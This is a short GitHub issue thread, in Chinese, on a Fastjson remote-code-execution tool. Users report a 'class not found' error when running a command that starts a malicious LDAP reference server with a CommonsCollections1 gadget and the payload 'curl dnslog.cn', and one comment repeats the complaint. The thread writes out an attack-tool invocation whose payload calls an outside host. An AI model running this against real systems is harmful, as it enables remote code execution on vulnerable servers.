### ISSUE TITLE
找不到类

### ISSUE THREAD

**Issue by getin63** [wyzxxz/fastjson_rce_tool#8]
师傅您好，使用这条命令
java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099  CommonsCollections1 "curl dnslog.cn"
会提示
“Error: Could not find or load main class fastjson.LDAPRefServer2”

**Comment by wyzxxz** [comment]
已经加上了

**Comment by CtrlAltDelet** [comment]
师傅您好 java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099  CommonsCollections1 "curl dnslog.cn"仍然找不到类

**Comment by CtrlAltDelet** [comment]
师傅您好 java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099  CommonsCollections1 "curl dnslog.cn"仍然找不到类
